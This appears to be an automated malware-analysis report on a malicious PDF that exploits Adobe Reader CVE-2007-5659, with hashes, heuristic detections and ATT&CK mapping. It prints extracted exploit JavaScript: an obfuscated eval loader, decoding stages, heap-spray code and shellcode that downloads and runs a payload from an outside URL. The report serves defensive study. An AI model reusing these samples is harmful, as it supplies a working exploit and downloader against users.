PDF malware analysis — malicious · 6189d4a081f4433f

MALICIOUS

PDF

16.2 KB

MD5: b0cbe9b6b237bbd13490aa35e6cb8dc8 SHA-1: 69196203bfb6b08d514fdfe74b301ea09cb379ec SHA-256: 6189d4a081f4433f320b0af41c2a852cf33e8ac240db6ef7cb2412be5c34bd57

366 Risk Score

Malware Insights

MITRE ATT&CK

T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF contains obfuscated JavaScript that exploits CVE-2007-5659 in Adobe Reader. The script decodes a URL from its subject field and uses String.fromCharCode to construct a JavaScript execution command. This command then downloads and executes a second-stage payload from the embedded URL http://goorpp.info/page/index/n00a106201r0409R9aa08994Xb65dfcb9Y6a02bb15Z0100f070.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 10

Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659

PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
JavaScript action low 5 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE

PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Obfuscated multi-stage PDF JavaScript dropper high PDF_JS_OBFUSCATED_DROPPER

PDF JavaScript shows 5 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, hex_dashed_payload, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL

Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://goorpp.info/page/index/n00a106201r0409R9aa08994Xb65dfcb9Y6a02bb15Z0100f070 Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0005_000.js` `4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d`	pdf-javascript-stream	PDF /JS object 5 at offset 0x148	469 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var pr = null; var fnc = 'ev'; var sum = ''; app.doc.syncAnnotScan(); if (app.plugIns.length != 0) { var num = 1; pr = app.doc.getAnnots( { nPage: 0 } ); sum = pr[num].subject; } var buf = ""; if (app.plugIns.length > 3) { fnc += 'a'; var arr = sum.split(/-/); for (var i = 1; i < arr.length; i++) { buf += String.fromCharCode("0x"+arr[i]); } fnc += 'l'; } if (app.plugIns.length >= 2) { app[fnc]/**/(buf); }
`legacy_pdfkit_stage_000.js` `c46714e3f12ff6847258cc11731524d26bb02f9350914151bf79f76ebc730b30`	deobfuscated-js	repeated-marker hex decoded JavaScript at offset 0x1BA4	12393 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script function N___FD_8(H_Bb_XR3, vC_8__j_4q){var fgh = "eva";var Tonxf__lVL = arguments.callee;var w_dvpf_1_Pu = 0;try {var T_7cCGwhj__q_B = 0;if (app) {w_dvpf_1_Pu++;vC_8__j_4q = pr[T_7cCGwhj__q_B].subject;}w_dvpf_1_Pu++;} catch(e) { }var F__8Y__Q___W = new Array();if (H_Bb_XR3) { F__8Y__Q___W = H_Bb_XR3;} else {var e_LG_D_V_olJ0wp = 0;var t__5044_dg4_0 = 0;var U31Pl3__jMVc = 512;var P_Fhq3w = 53;Tonxf__lVL = Tonxf__lVL.toString();P_Fhq3w = P_Fhq3w - 5;var ES_AK_MN_6 = P_Fhq3w + 10;ES_AK_MN_6 = ES_AK_MN_6 - 1;while(t__5044_dg4_0 < Tonxf__lVL.length) {var a0ps_R = 1;var J_5M0LWuEm = Tonxf__lVL["charCo" + "deAt"](t__5044_dg4_0);if (J_5M0LWuEm >= P_Fhq3w && J_5M0LWuEm <= ES_AK_MN_6) {if (e_LG_D_V_olJ0wp == 4) {e_LG_D_V_olJ0wp = 0;}if (isNaN(F__8Y__Q___W[e_LG_D_V_olJ0wp])) {var T_7cCGwhj__q_B = 0;F__8Y__Q___W[e_LG_D_V_olJ0wp] = T_7cCGwhj__q_B;}F__8Y__Q___W[e_LG_D_V_olJ0wp] += J_5M0LWuEm;if (F__8Y__Q___W[e_LG_D_V_olJ0wp] > U31Pl3__jMVc) {F__8Y__Q___W[e_LG_D_V_olJ0wp] -= 512;}e_LG_D_V_olJ0wp++;}t__5044_dg4_0++;}}e_LG_D_V_olJ0wp = 4;for (var Yb6T_J5H5f = 0; Yb6T_J5H5f < 4; Yb6T_J5H5f++) {if (F__8Y__Q___W[Yb6T_J5H5f] > 256) {F__8Y__Q___W[Yb6T_J5H5f] -= 256;}}var yV30iH2o5 = 0;var Jf80xN_G1G = "";var HIE_0TI = 0;var u_28Yc_0lnf = 0;var o4I4Iye422Tp = 0;var v4__764_5_bX_l;var fyeL26_c = 23;while(u_28Yc_0lnf < vC_8__j_4q.length) {var yXlorb = vC_8__j_4q.substr(u_28Yc_0lnf, 1) + "YY";var ei08Yk_74_23_l = parseInt(yXlorb, fyeL26_c);if (HIE_0TI) {v4__764_5_bX_l += ei08Yk_74_23_l;if (yV30iH2o5 == 4) {yV30iH2o5 -= 4;}var F5I57_A7S = v4__764_5_bX_l;F5I57_A7S = F5I57_A7S - (o4I4Iye422Tp + 2) * F__8Y__Q___W[yV30iH2o5];if (F5I57_A7S < 0) {F5I57_A7S = F5I57_A7S - Math.floor(F5I57_A7S / 256) * 256;}F5I57_A7S = String.fromCharCode(F5I57_A7S);if (w_dvpf_1_Pu == 2) {Jf80xN_G1G += F5I57_A7S;} else if (w_dvpf_1_Pu == 1) {Jf80xN_G1G += ei08Yk_74_23_l;} else {Jf80xN_G1G += u_28Yc_0lnf;}yV30iH2o5++;o4I4Iye422Tp++;HIE_0TI = 0;} else {v4__764_5_bX_l = ei08Yk_74_23_l * 23;HIE_0TI = 1;}u_28Yc_0lnf++;}var aa = this;aa[fgh + 'l'](Jf80xN_G1G);} N___FD_8(0, "0i8468601i8h6l3c4f02877f780g974b6i1h88ai125j9h3e42742j0j375d2d6e85a72i0d8hb15g670j248d0d3m216m5c402d9c2i96709h8d0j6e2h2b137b28984d035h3i8e9g5a687d056h442b529kag496g0e1j6f88180b89781146968i439a3f9k6a5m4b2g4m0h5e46756f7j3k7b9j0c6j92783e920f2361ae2k8i90071i410i2e68601b464k1f5d6e7a9a6j7596287b8i0h79ab7e0g48160i2ham5028435g864f61ak8a697e5i2i7k8h1h4f65785a7ha60ia4960h185m9k0m001004121b6j5f60680i8i6m7h689g8l7m1kag837j822301b22d3f0c9h8a760j255hal3324970g503g5d506644a84g928b4e8014af0d141db26l1h18182l3l5c308g8j7a4c16847d6089057g511f2m997l9a52ac7a1k6i4a0ma51f211c34364c2hb14j7b355h838i3h0d7j9d44711m279418383gae4e604i91b1a2730b7g057h270e0k974l66650g5f418g234c8dag2c671lai2d807m3d6092283f5da383769d312c8k804d0l1j154i3d540m6la17a4b7a658m5m9g0hac7d8h500ka41c09618g2h867e0c352mal1j3h8lae2e443g2l5f6b9a776896379f8ia9881085265e2h1g3d03682g1h3e681d3m0jak2h4c6b03716b124c7h96626ka4a900989e1l7m132c3f2k04262f5f382m2i4951715492898a8c3012929j9i369i031j4la99j8a640j0b2c073943982d6l4f5c42896l015fa06h3l010ca6271aa5097f0k101c0961332h867e62352mal793h8l02a5744450108g6g49046m26740b147910311832366d1ka94i81434l689f2ia17j894k46a8b15d2949349g56503988076a68ah7g9i7h2m1e2b8946894f925g0a5c9g7095a5136d2fb25hb0aj486a0c4j407f1bab72791c330gam4i093b1c2i4a26104d938f1c896i9k427m059d5l884g1d679hb037ae2k816ha82l16843j6c8j311860472g3e679a51759g516i7788b10j9j182m36a22h9h5g07243b914e5017065l7d6fae516c9k2h91a04648960ham739h185f0b243d083b404i8h665g2i1g67434l6h7b9f5d2m27817f7i3m9cb24d75a9b07h641c022c9029350j0e4f3c5m2m866l1d5k729e6laa139m9j1e23884m2g44ac02414m0g818b782039018h5k9f2e6l45211l965m6g87a18i507d1492a39l4i185h0c4k00843f5k1b4159ai5e0cad975452a6005d9d29096m4h403g0ham7344185f0b7h3dak0f6d1b7h2g83360a7k1a6l788b1f6h4g1i58afae4e36014g695jah9676aa31650iak510b361i2i6m361l6l1c5f316d7fa23kaa1l26500h5c3j811h1k58ac2h818m1m360e84186b7g04424l3h3b379caa74816m3ea68309900j91ah340caa00085m3919478m4h5e1c842j463m0781891l1d8h9g706h8b0m269j9i9h658k2m0l2g20433k7g58575c3f8i6058a2a7965d2i1ca58c7m4g0a082e4920agab9e20345d8c2h1ha22d6l48435h86779l5a9j6c6faf8f859j1m00046a40330f23614m35917 ... (truncated)
`legacy_pdfkit_stage_001.js` `1bbe1a2d43a11330be715f3a75952dfdc748c58def08cd38e37ec18e83ec8e3f`	deobfuscated-js	nested inline base-23 callee-key decoded JavaScript at offset 0x1BA4	5162 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var UJ_____6eIVe = new Array();var c5_C_GoeSWH = 0;var sgE__656uMhdmr = "";function eq_yU68H13_7x(t_S_2_5_F_02, PR1__bO__abpkP){var Nc04tuK_Y_U40_q = PR1__bO__abpkP.toString();var ab_77C = "";for(var SjW124485V_1 = 0; SjW124485V_1 < Nc04tuK_Y_U40_q.length; SjW124485V_1++) {var c7_5_dKUJb_O6c = parseInt(Nc04tuK_Y_U40_q.substr(SjW124485V_1, 1));if (!isNaN(c7_5_dKUJb_O6c)) {c7_5_dKUJb_O6c = c7_5_dKUJb_O6c.toString(16);if (c7_5_dKUJb_O6c.length == 1) { c7_5_dKUJb_O6c = "0" + c7_5_dKUJb_O6c; }else if (c7_5_dKUJb_O6c.length != 2) { c7_5_dKUJb_O6c = "00"; }ab_77C = c7_5_dKUJb_O6c + ab_77C;}}while(ab_77C.length < 8) { ab_77C = "0" + ab_77C; }var Jq201_0__r = t_S_2_5_F_02.toString(16);if (Jq201_0__r.length == 1) { Jq201_0__r = "0" + Jq201_0__r; }else if (Jq201_0__r.length != 2) { Jq201_0__r = "00"; }ab_77C = "3" + Jq201_0__r + "P" + ab_77C;return ab_77C;}function v7M_q6C7vd2pjx(q5dJhYO___jvK, DuG0_1dD){var QpPiE_A77 = new Array("");var b___8vjn2 = q5dJhYO___jvK;var F_dD5p_h21_6_q;if ((F_dD5p_h21_6_q = q5dJhYO___jvK.lastIndexOf("%u00")) != -1) {if (F_dD5p_h21_6_q + 6 == q5dJhYO___jvK.length) {QpPiE_A77[0] = q5dJhYO___jvK.substr(F_dD5p_h21_6_q + 4, 2);b___8vjn2 = q5dJhYO___jvK.substring(0, F_dD5p_h21_6_q);}}F_dD5p_h21_6_q = 1;for (SjW124485V_1 = 0; SjW124485V_1 < DuG0_1dD.length; SjW124485V_1++) {var KhyGw____QcfWy = DuG0_1dD.charCodeAt(SjW124485V_1).toString(16);if (KhyGw____QcfWy.length == 1) { KhyGw____QcfWy = "0" + KhyGw____QcfWy; }QpPiE_A77[F_dD5p_h21_6_q] = KhyGw____QcfWy;F_dD5p_h21_6_q++;}SjW124485V_1 = QpPiE_A77[0].length ? 0 : 1;QpPiE_A77[F_dD5p_h21_6_q] = "00";QpPiE_A77[F_dD5p_h21_6_q + 1] = "00";F_dD5p_h21_6_q += 2;if ((QpPiE_A77.length - SjW124485V_1) % 2) {QpPiE_A77[F_dD5p_h21_6_q] = "00";}while(SjW124485V_1 < QpPiE_A77.length) {b___8vjn2 += "%u" + QpPiE_A77[SjW124485V_1 + 1] + QpPiE_A77[SjW124485V_1];SjW124485V_1 += 2;}b___8vjn2 += "%u0000";return b___8vjn2;}function NLD__U_6x663_7(i__HVb_plxm, UA_74M6_mn){while (i__HVb_plxm.length2<UA_74M6_mn) {i__HVb_plxm += i__HVb_plxm;}i__HVb_plxm = i__HVb_plxm.substring(0,UA_74M6_mn/2);return i__HVb_plxm;}function kM_tx_Mdkuw(s41____4R__6, e0_Q615_u4b, Ps38_44fXw0){var q7Gv__74Rs__vX = 0x0c0c0c0c;var i__HVb_plxm = unescape(e0_Q615_u4b);var DuG0_1dD = eq_yU68H13_7x(s41____4R__6, Ps38_44fXw0);var XH__fb8_2V25fLp = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var q5dJhYO___jvK = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u7170%u6f4d%u006a%u7468%u7074%u2f3a%u672f%u6f6f%u7072%u2e70%u6e69%u6f66%u702f%u6761%u2f65%u6e69%u6564%u2f78%u306e%u6130%u3031%u3236%u3130%u3072%u3034%u5239%u6139%u3061%u3938%u3439%u6258%u3536%u6664%u6263%u5939%u6136%u3230%u6262%u3531%u305a%u3031%u6630%u3730%u0030";app.J4__7dvF = unescape(v7M_q6C7vd2pjx(q5dJhYO___jvK, DuG0_1dD));var HG_24_S_6_11_p3 = 0x400000;var E8_q__eGIk5_n = XH__fb8_2V25fLp.length 2;var UA_74M6_mn = HG_24_S_6_11_p3 - (E8_q__eGIk5_n+0x38);i__HVb_plxm = NLD__U_6x663_7(i__HVb_plxm, UA_74M6_mn);var xf28_m_2_68 = (q7Gv__74Rs__vX - 0x400000)/HG_24_S_6_11_p3;for (var U_2TEtQ_s8_X = 0; U_2TEtQ_s8_X < xf28_m_2_68; U_2TEtQ_s8 ... (truncated)
`deobfuscated.js` `483bd25bfe5e470aff5bbed1988fd9643c7f599d3e6c15c07858202664965796`	deobfuscated-js	PDF JavaScript deobfuscation pass	83351 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 10 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script var pr = null; var fnc = 'ev'; var sum = ''; app.doc.syncAnnotScan(); if (app.plugIns.length != 0) { var num = 1; pr = app.doc.getAnnots( { nPage: 0 } ); sum = pr[num].subject; } var buf = ""; if (app.plugIns.length > 3) { fnc += 'a'; var arr = sum.split(/-/); for (var i = 1; i < arr.length; i++) { buf += String.fromCharCode("0x"+arr[i]); } fnc += 'l'; } if (app.plugIns.length >= 2) { app.eval(buf); } 0i8468601i8h6l3c4f02877f780g974b6i1h88ai125j9h3e42742j0j375d2d6e85a72i0d8hb15g670j248d0d3m216m5c402d9c2i96709h8d0j6e2h2b137b28984d035h3i8e9g5a687d056h442b529kag496g0e1j6f88180b89781146968i439a3f9k6a5m4b2g4m0h5e46756f7j3k7b9j0c6j92783e920f2361ae2k8i90071i410i2e68601b464k1f5d6e7a9a6j7596287b8i0h79ab7e0g48160i2ham5028435g864f61ak8a697e5i2i7k8h1h4f65785a7ha60ia4960h185m9k0m001004121b6j5f60680i8i6m7h689g8l7m1kag837j822301b22d3f0c9h8a760j255hal3324970g503g5d506644a84g928b4e8014af0d141db26l1h18182l3l5c308g8j7a4c16847d6089057g511f2m997l9a52ac7a1k6i4a0ma51f211c34364c2hb14j7b355h838i3h0d7j9d44711m279418383gae4e604i91b1a2730b7g057h270e0k974l66650g5f418g234c8dag2c671lai2d807m3d6092283f5da383769d312c8k804d0l1j154i3d540m6la17a4b7a658m5m9g0hac7d8h500ka41c09618g2h867e0c352mal1j3h8lae2e443g2l5f6b9a776896379f8ia9881085265e2h1g3d03682g1h3e681d3m0jak2h4c6b03716b124c7h96626ka4a900989e1l7m132c3f2k04262f5f382m2i4951715492898a8c3012929j9i369i031j4la99j8a640j0b2c073943982d6l4f5c42896l015fa06h3l010ca6271aa5097f0k101c0961332h867e62352mal793h8l02a5744450108g6g49046m26740b147910311832366d1ka94i81434l689f2ia17j894k46a8b15d2949349g56503988076a68ah7g9i7h2m1e2b8946894f925g0a5c9g7095a5136d2fb25hb0aj486a0c4j407f1bab72791c330gam4i093b1c2i4a26104d938f1c896i9k427m059d5l884g1d679hb037ae2k816ha82l16843j6c8j311860472g3e679a51759g516i7788b10j9j182m36a22h9h5g07243b914e5017065l7d6fae516c9k2h91a04648960ham739h185f0b243d083b404i8h665g2i1g67434l6h7b9f5d2m27817f7i3m9cb24d75a9b07h641c022c9029350j0e4f3c5m2m866l1d5k729e6laa139m9j1e23884m2g44ac02414m0g818b782039018h5k9f2e6l45211l965m6g87a18i507d1492a39l4i185h0c4k00843f5k1b4159ai5e0cad975452a6005d9d29096m4h403g0ham7344185f0b7h3dak0f6d1b7h2g83360a7k1a6l788b1f6h4g1i58afae4e36014g695jah9676aa31650iak510b361i2i6m361l6l1c5f316d7fa23kaa1l26500h5c3j811h1k58ac2h818m1m360e84186b7g04424l3h3b379caa74816m3ea68309900j91ah340caa00085m3919478m4h5e1c842j463m0781891l1d8h9g706h8b0m269j9i9h658k2m0l2g20433k7g58575c3f8i6058a2a7965d2i1ca58c7m4g0a082e4920agab9e20345d8c2h1ha22d6l48435h86779l5a9j6c6faf8f859j1m00046a40330f23614m35917e494g2l0f904d992a9l802j4m8j5f6l81ah7f1d740k887aab21a72l0l3e3m0360541h4c839g489g04b17748b01b6c1252077a464m1k9e076a6maf7lag832b1i2l97438k68a0393h811m76a0ae0c5d520l5491a52j609i2j4f79aaa9627f00619aal350a270a5c5m50347lb05753966iah6haca4027904641i9g182c428c2h668b1h190d840f3760061h583f4f5f877h827ga8266i7788ala3ad0a5730022haj5g2j534h604i6b0c07697h6h2c795la4225k8e706m90962c9410ac5g0b092h360d245a9g46575h205m7e6l9b866a87221cai6m87159d9c4k722j9h82874129369736269b0h675c3m266i449j5k727i739c997hagaa03966m3e199h0e373i3g706a6c23319h5m62902ka07j3l328b7i9l6hai7h287f1c969h0j2ia52f0l3e3m0g5i8h194h8cae4b1aadb16l67161f8e0h5a0785465d5da1ak94441d6c9b7l332d3h824j8e5e9d6a0i761i6d7286106a24aj419g7i1e3k0k565k8b24al9b9b08369b882d0b2k9c3352593j5k1i7a46876f9660a01227560c7e4697262c379116576b9h1941841f5l9k14536l3c4f5f7g9e796kaj1b81618a82977ea52429143k9i6h28435e83375g0ga56e583d346a910a4h7b9g5g508aal0g940j045k1524330c0l3h288963552i1g516077a5949b873k1ca0929m4602123057201d9770472h5f973343992d7b363g3a9d6915727j684i809g7k1114am885k0k2i221b6b3j2h6h6h4i3m0iaj5m62902ka07j3l1l9j5d7948016m257m2e0g9b163f183e1c4e2d9h5g832m3i8k9b5l9d8db153672f195dah1d097f4m4231ab2c8c6e057ga76010271j9748753c0b5c3d5jaa6l77a53f5d1e9l2a9e712b368a2c484lal998j981d3a0kag4c950d133h5m5ib24fa94g276h72a43277a40d83aa7i2b8m0109478937879317513584082i852g3h4l1d2i3i6e7e6g757g1k6i6688849e7e2d474003349g5g11293k7m2j5c0e993f7f67265267122c8eab6l408g88a6739g9j631i35332l3b401h7k5j4m3c155l5055769j8a6713007692ac370k9m4d5206ah88993j395e115c1i8a3i6j5c5m506d7l15827k5d49898f71a123a788520k2i221b6b3j2h6h6h4i3m27067h3c6i087i551g4602676g4ja17g436i0m889c1d431i ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.